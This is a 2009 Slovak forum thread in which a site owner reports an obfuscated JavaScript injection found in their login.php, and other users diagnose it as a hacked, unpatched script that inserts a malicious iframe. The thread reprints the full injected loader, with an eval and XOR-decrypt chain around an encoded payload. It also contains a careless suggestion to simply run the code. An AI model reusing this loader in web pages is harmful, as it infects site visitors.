| | |
| Stránka: 1 z 1
| [ Príspevkov: 12 ] | |
Autor | Správa |
---|
Registrovaný: 22.03.07 Prihlásený: 04.07.14 Príspevky: 344 Témy: 97 |
Nazdarek.. Vopred sa ospravedlnujem ak to nepatri do tejto sekcie, ale fakt neviem kam presne to zaradit. Ked som si dnes klikol na stranku, na ktorej momentalne pracujem, tak som si v subore login.php nasiel nieco take:
Kód: <body><!-- ad --><script>window['e<v#a}l<'.replace(/[\}b\<#u]/g, '')](window['e<v#a}l<'.replace(/[\}b\<#u]/g, '')]('uDnDeTsTcTaTp4eT'.replace(/[N4,TD]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%6c%68%61%28%41%49%44%29%7b%66%75%6e%63%74%69%6f%6e%20%41%44%41%28%4c%41%48%61%68%29%7b%65%76%61%6c%28%22%76%61%72%20%50%61%54%4c%48%61%48%3d%30%3b%22%29%3b%76%61%72%20%41%70%54%6c%3d%4c%41%48%61%68%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%41%49%68%70%47%6c%3d%30%3b%22%29%3b%77%68%69%6c%
Zaujimalo by ma, co to vlastne je.. Ci doslo k nejakej chybe na strane servera, alebo mi niekto hackol stranku.. A ak to bol hack, vedel by mi niekto k tomu cosi blizsie povedat??? Prosim, mohli by ste mi to ozrejmit??? Vdaka...
|
|
Registrovaný: 26.11.06 Prihlásený: 22.01.24 Príspevky: 4118 Témy: 319 Bydlisko: HE/BA | Napísal Flety: 11.01.2009 14:45 | |
|
Podľa toho komentára súdim, že ten hosting je free a dávajú si reklamu na stránky a teda je to reklama
|
|
Registrovaný: 22.03.07 Prihlásený: 04.07.14 Príspevky: 344 Témy: 97 | Napísal autor témy newboy1: 11.01.2009 15:11 | |
|
Nie..Praveze nie je to free hosting.. Je to riadne plateny hosting.. Takze ak by si chceli hodit nieco na moju domenu,tak by ma mali najprv kontaktovat a mat moj suhlas.. Teda aspon myslim, ze by mali... Ale urcite nemam free hosting..
|
|
Registrovaný: 26.11.06 Prihlásený: 22.01.24 Príspevky: 4118 Témy: 319 Bydlisko: HE/BA | Napísal Flety: 11.01.2009 15:18 | |
|
Skús si stiahnúť ten skript a otvoriť no z vlastného disku, keď to tam bude tak to jednoducho odstráň, ak nie tak potom je to imho niečo na meranie návštevnosti alebo niečo podobné, zrejme sa toho netreba báť, kde to máš vlastne uložené u akej firmy?
|
|
Registrovaný: 27.07.07 Príspevky: 3948 Témy: 51 Bydlisko: Bratislava |
to si mu mal teda co poradit, aby si pripadny skodlivy kod spustil priamo z localhostu...
ak si ho tam nedal ty, tak si to odtial vymaz s hned si aj zmen heslo na ftp...
kedze ten kod nie je uplny, tak si ho skus "dekodovat" na http://scriptasylum.com/tutorials/encde ... ecode.html a uvidis, co to robi...
_________________ NTB: Acer Aspire 4820TG 14" | CPU: Intel Core i5 2,53 GHz | VGA: ATI Mobility Radeon HD5650 1GB | RAM: 8GB DDR3 1066 MHz | HDD: 1TB SSD WD BLUE |
|
Registrovaný: 22.03.07 Prihlásený: 04.07.14 Príspevky: 344 Témy: 97 | Napísal autor témy newboy1: 11.01.2009 17:05 | |
|
stenley...takze je to hack??
|
|
Registrovaný: 27.07.07 Príspevky: 3948 Témy: 51 Bydlisko: Bratislava |
nie je to tvoj kod, nie je to kod z hostingu, tak to tam nema co robit... mozno mas nejaku bezpecnostnu dieru na stranke, neviem... ale pre istotu si cim skor vsetky pristupove udaje zmen...
_________________ NTB: Acer Aspire 4820TG 14" | CPU: Intel Core i5 2,53 GHz | VGA: ATI Mobility Radeon HD5650 1GB | RAM: 8GB DDR3 1066 MHz | HDD: 1TB SSD WD BLUE |
|
Registrovaný: 30.05.06 Prihlásený: 28.06.15 Príspevky: 2278 Témy: 45 Bydlisko: ZA |
daj sem cely ten kod aspon...
|
|
Registrovaný: 28.12.08 Prihlásený: 12.01.09 Príspevky: 78 Témy: 0 |
...zakladne pravidla(nemusia platit vzdy!):
1. cudzi kod ktory je za znackou </html> je chybne nastavenie servera alebo virus v tvojom pocitaci....
2. cudzi kod vo vnutri kodu je injection
=>...tvoj kod sa nachadza po <body> takze to je injection...=> mas deravy script...
|
|
Registrovaný: 22.03.07 Prihlásený: 04.07.14 Príspevky: 344 Témy: 97 | Napísal autor témy newboy1: 12.01.2009 15:06 | |
|
No je pravda, ze script este nie je osetreny, lebo este len robim na stranke a este som to neosetroval..
Tu je cely kod:
Kód: <style type="text/css"> * {margin:0; padding:0; } html, body { height:100%; background-color: #333333} body { min-width: 800px; text-align: center;} body>#container { height: auto; border-width: 1px 3px 1px 3px; border-style: solid; border-color: #222222;} </style> </head>
<body><!-- ad --><script>window['eTvma^lT'.replace(/[mP\^TC]/g, '')](window['eTvma^lT'.replace(/[mP\^TC]/g, '')]('uVnFeVs&cVa^pFe^'.replace(/[\{&FV\^]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%4c%70%61%70%28%4c%49%61%47%44%29%7b%66%75%6e%63%74%69%6f%6e%20%41%41%44%6c%49%61%28%41%41%48%29%7b%65%76%61%6c%28%22%76%61%72%20%41%41%41%61%3d%30%3b%22%29%3b%76%61%72%20%50%44%4c%48%3d%41%41%48%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%4c%41%54%49%49%3d%30%3b%22%29%3b%77%68%69%6c%65%28%4c%41%54%49%49%3c%50%44%4c%48%29%7b%41%41%41%61%2b%3d%41%54%44%41%28%41%41%48%2c%4c%41%54%49%49%29%2a%50%44%4c%48%3b%4c%41%54%49%49%2b%2b%3b%7d%72%65%74%75%72%6e%20%28%41%41%41%61%2b%27%27%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%41%54%44%41%28%48%70%6c%49%4c%54%2c%41%41%70%61%29%7b%72%65%74%75%72%6e%20%48%70%6c%49%4c%54%2e%63%68%61%72%43%6f%64%65%41%74%28%41%41%70%61%29%3b%7d%20%20%20%74%72%79%20%7b%76%61%72%20%41%61%70%50%41%3d%65%76%61%6c%28%27%61%71%72%40%67%21%75%71%6d%5b%65%5b%6e%21%74%5b%73%21%2e%5b%63%28%61%21%6c%28%6c%28%65%21%65%21%27%2e%72%65%70%6c%61%63%65%28%2f%5b%5c%5b%71%5c%21%5c%28%40%5d%2f%67%2c%20%27%27%29%29%2c%50%61%70%44%54%54%3d%27%27%3b%76%61%72%20%48%6c%54%3d%30%2c%4c%68%4c%44%3d%30%2c%41%68%44%47%41%47%3d%28%6e%65%77%20%53%74%72%69%6e%67%28%41%61%70%50%41%29%29%2e%72%65%70%6c%61%63%65%28%2f%5b%5e%40%61%2d%7a%30%2d%39%41%2d%5a%5f%2e%2c%2d%5d%2f%67%2c%27%27%29%3b%76%61%72%20%48%44%68%68%70%44%3d%41%41%44%6c%49%61%28%41%68%44%47%41%47%29%3b%65%76%61%6c%28%22%4c%49%61%47%44%3d%75%6e%65%73%63%61%70%65%28%4c%49%61%47%44%29%3b%22%29%3b%66%6f%72%28%76%61%72%20%48%61%6c%50%3d%30%3b%20%48%61%6c%50%20%3c%20%28%4c%49%61%47%44%2e%6c%65%6e%67%74%68%29%3b%20%48%61%6c%50%2b%2b%29%7b%76%61%72%20%50%49%68%61%49%50%3d%41%54%44%41%28%41%68%44%47%41%47%2c%48%6c%54%29%5e%41%54%44%41%28%48%44%68%68%70%44%2c%4c%68%4c%44%29%3b%76%61%72%20%50%49%41%70%41%54%3d%41%54%44%41%28%4c%49%61%47%44%2c%48%61%6c%50%29%3b%48%6c%54%2b%2b%3b%4c%68%4c%44%2b%2b%3b%69%66%28%4c%68%4c%44%3e%48%44%68%68%70%44%2e%6c%65%6e%67%74%68%29%4c%68%4c%44%3d%30%3b%69%66%28%48%6c%54%3e%41%68%44%47%41%47%2e%6c%65%6e%67%74%68%29%48%6c%54%3d%30%3b%50%61%70%44%54%54%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%50%49%41%70%41%54%5e%50%49%68%61%49%50%29%20%2b%20%27%27%3b%7d%65%76%61%6c%28%50%61%70%44%54%54%29%3b%20%72%65%74%75%72%6e%20%50%61%70%44%54%54%3d%6e%75%6c%6c%3b%7d%63%61%74%63%68%28%65%29%7b%7d%7d%41%4c%70%61%70%28%27%25%33%32%25%33%36%25%33%33%25%33%36%25%33%36%25%33%30%25%33%31%25%33%30%25%36%31%25%33%66%25%32%37%25%31%61%25%30%37%25%30%61%25%33%38%25%31%39%25%33%30%25%36%63%25%33%64%25%36%61%25%37%64%25%32%65%25%33%36%25%32%62%25%32%37%25%37%65%25%33%61%25%30%35%25%31%33%25%32%64%25%35%66%25%33%38%25%34%63%25%31%34%25%31%37%25%30%36%25%33%31%25%33%61%25%33%61%25%32%65%25%32%33%25%36%63%25%31%33%25%30%33%25%32%34%25%33%32%25%37%32%25%32%30%25%31%32%25%32%38%25%30%35%25%31%38%25%31%39%25%32%36%25%30%37%25%35%66%25%35%63%25%37%31%25%33%63%25%32%37%25%33%65%25%33%61%25%31%31%25%37%64%25%37%61%25%37%65%25%37%37%25%33%35%25%36%38%25%32%33%25%33%30%25%32%66%25%34%65%25%34%35%25%31%32%25%30%62%25%37%32%25%33%37%25%36%33%25%37%36%25%34%33%25%33%62%25%31%35%25%30%31%25%30%39%25%30%61%25%30%64%25%34%66%25%31%37%25%32%32%25%35%35%25%31%34%25%31%64%25%30%33%25%32%33%25%31%65%25%30%62%25%35%61%25%32%39%25%30%37%25%31%61%25%31%37%25%33%64%25%34%31%25%35%31%25%30%61%25%35%37%25%33%61%25%30%37%25%30%36%25%33%65%25%30%61%25%30%65%25%30%33%25%30%63%25%31%62%25%33%63%25%33%34%25%33%36%25%36%66%25%36%34%25%33%33%25%33%37%25%31%34%25%30%35%25%32%39%25%37%34%25%37%63%25%36%36%25%36%38%25%37%63%25%37%66%25%37%38%25%33%30%25%34%30%25%30%30%25%30%37%25%30%33%25%33%36%25%30%61%25%33%34%25%32%66%25%31%30%25%32%65%25%31%33%25%36%65%25%31%37%25%35%66%25%36%31%25%33%37%25%33%31%25%33%34%25%31%39%25%32%32%25%32%36%25%33%32%25%30%63%25%32%32%25%33%39%25%30%61%25%35%62%25%37%38%25%33%63%25%36%35%25%37%32%25%36%63%25%36%34%25%31%63%25%37%30%25%32%37%25%30%30%25%30%37%25%30%33%25%30%36%25%30%33%25%33%34%25%33%38%25%32%37%25%33%37%25%30%64%25%32%31%25%37%66%25%36%36%25%31%66%25%33%32%25%32%39%25%30%36%25%31%39%25%31%31%25%36%33%25%37%62%25%37%66%25%36%37%25%36%65%25%37%39%25%35%31%25%33%33%25%31%61%25%32%30%25%32%65%25%33%62%25%33%64%25%32%63%25%33%37%25%33%31%25%33%31%25%30%65%25%33%61%25%32%33%25%37%38%25%33%32%25%36%38%25%33%32%25%33%31%25%32%65%25%30%38%25%31%30%25%33%64%25%33%66%25%32%62%25%31%32%25%37%66%25%37%32%25%33%35%25%36%62%25%37%33%25%33%62%25%31%34%25%30%33%25%31%36%25%32%35%25%33%38%25%36%61%25%32%64%25%37%37%25%31%39%25%37%30%25%37%66%25%30%65%25%30%63%25%31%34%25%31%39%25%35%35%25%37%31%25%30%32%25%32%66%25%35%61%25%31%37%25%30%34%25%31%38%25%33%64%25%31%31%25%32%63%25%30%61%25%32%39%25%36%34%25%37%37%25%37%37%25%32%64%25%33%30%25%30%30%25%30%61%25%32%37%25%30%32%25%35%39%25%30%64%25%31%32%25%36%39%25%37%37%25%34%61%25%33%38%25%37%61%25%34%38%25%32%61%25%33%37%25%36%61%25%33%33%25%32%64%25%30%39%25%35%61%25%32%30%25%31%34%25%31%34%25%33%38%25%35%64%25%37%64%25%31%66%25%36%64%25%33%34%25%31%36%25%30%38%25%33%39%25%35%61%25%36%38%25%37%30%25%37%62%27%29%3b'));</script><!-- /ad --> <div id="container"> <div id="head">Hlavička</div> A tu je to co mi prekodovalo cez ten crypter na http://scriptasylum.com/tutorials/encdec/encode-decode.html : Kód: <body><!-- ad --><script>window['eTvma^lT'.replace(/[mP\^TC]/g, '')](window['eTvma^lT'.replace(/[mP\^TC]/g, '')]('uVnFeVs&cVa^pFe^'.replace(/[\{&FV\^]/g, ''))('function ALpap(LIaGD){function AADlIa(AAH){eval("var AAAa=0;");var PDLH=AAH.length;eval("var LATII=0;");while(LATII<PDLH){AAAa+=ATDA(AAH,LATII)*PDLH;LATII++;}return (AAAa+'');}function ATDA(HplILT,AApa){return HplILT.charCodeAt(AApa);} try {var AapPA=eval('aqr@g!uqm[e[n!t[s!.[c(a!l(l(e!e!'.replace(/[\[q\!\(@]/g, '')),PapDTT='';var HlT=0,LhLD=0,AhDGAG=(new String(AapPA)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var HDhhpD=AADlIa(AhDGAG);eval("LIaGD=unescape(LIaGD);");for(var HalP=0; HalP < (LIaGD.length); HalP++){var PIhaIP=ATDA(AhDGAG,HlT)^ATDA(HDhhpD,LhLD);var PIApAT=ATDA(LIaGD,HalP);HlT++;LhLD++;if(LhLD>HDhhpD.length)LhLD=0;if(HlT>AhDGAG.length)HlT=0;PapDTT+=String.fromCharCode(PIApAT^PIhaIP) + '';}eval(PapDTT); return PapDTT=null;}catch(e){}}ALpap('%32%36%33%36%36%30%31%30%61%3f%27%1a%07%0a%38%19%30%6c%3d%6a%7d%2e%36%2b%27%7e%3a%05%13%2d%5f%38%4c%14%17%06%31%3a%3a%2e%23%6c%13%03%24%32%72%20%12%28%05%18%19%26%07%5f%5c%71%3c%27%3e%3a%11%7d%7a%7e%77%35%68%23%30%2f%4e%45%12%0b%72%37%63%76%43%3b%15%01%09%0a%0d%4f%17%22%55%14%1d%03%23%1e%0b%5a%29%07%1a%17%3d%41%51%0a%57%3a%07%06%3e%0a%0e%03%0c%1b%3c%34%36%6f%64%33%37%14%05%29%74%7c%66%68%7c%7f%78%30%40%00%07%03%36%0a%34%2f%10%2e%13%6e%17%5f%61%37%31%34%19%22%26%32%0c%22%39%0a%5b%78%3c%65%72%6c%64%1c%70%27%00%07%03%06%03%34%38%27%37%0d%21%7f%66%1f%32%29%06%19%11%63%7b%7f%67%6e%79%51%33%1a%20%2e%3b%3d%2c%37%31%31%0e%3a%23%78%32%68%32%31%2e%08%10%3d%3f%2b%12%7f%72%35%6b%73%3b%14%03%16%25%38%6a%2d%77%19%70%7f%0e%0c%14%19%55%71%02%2f%5a%17%04%18%3d%11%2c%0a%29%64%77%77%2d%30%00%0a%27%02%59%0d%12%69%77%4a%38%7a%48%2a%37%6a%33%2d%09%5a%20%14%14%38%5d%7d%1f%6d%34%16%08%39%5a%68%70%7b');'));</script><!-- /ad -->
Ale absolutne netusim co to je. No ale viem, ze zajtra sa hned pustim do osetrovania scriptov..
|
|
Registrovaný: 28.12.08 Prihlásený: 12.01.09 Príspevky: 78 Témy: 0 |
...to je este zakodovane....bud to odkodujes na vmachine alebo jednoduchsie je to spustit ale na vlastne riziko...
btw priamo v cistom html subore injection nemoze byt iba par specifickych druhov ale tie nebezia vacsinou z tvojho servera...ak nemas ziadny php subor tak je chyba na zabezpeceni servera...
|
|
Registrovaný: 13.11.07 Prihlásený: 20.08.16 Príspevky: 1702 Témy: 0 | Napísal chrono: 12.01.2009 16:45 | |
|
V podstate to vkladá do stránky iframe (Firefox ale rozpozná, že tá stránka, čo sa cez iframe vkladá je škodlivá, takže ju zablokuje).
|
|
| Stránka: 1 z 1
| [ Príspevkov: 12 ] | |
| Nemôžete zakladať nové témy v tomto fóre Nemôžete odpovedať na témy v tomto fóre Nemôžete upravovať svoje príspevky v tomto fóre Nemôžete mazať svoje príspevky v tomto fóre
|
|